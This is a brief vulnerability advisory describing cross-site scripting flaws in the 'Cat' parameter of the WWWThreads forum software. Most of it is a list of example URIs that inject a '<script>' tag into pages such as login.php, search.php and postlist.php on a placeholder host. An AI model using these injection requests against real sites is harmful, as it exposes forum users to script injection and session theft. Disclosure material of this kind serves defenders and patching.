WWWThreads Cat Parameter Multiple Cross-Site Scripting Vulnerabilities

WWWThreads Cat Parameter Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following example URIs are available:

www.example.com/[path]/dosearch.php?Cat=<script>
www.example.com/[path]/postlist.php?Cat=<script>
www.example.com/[path]/showmembers.php?Cat=<script>
www.example.com/[path]/faq_english.php?Cat=<script>
www.example.com/[path]/online.php?Cat=<script>
www.example.com/[path]/login.php?Cat=<script>
www.example.com/[path]/newuser.php?Cat=<script>
www.example.com/[path]/wwwthreads.php?Cat=<script>
www.example.com/[path]/search.php?Cat=<script>
www.example.com/[path]/postlist.php?Cat=<script>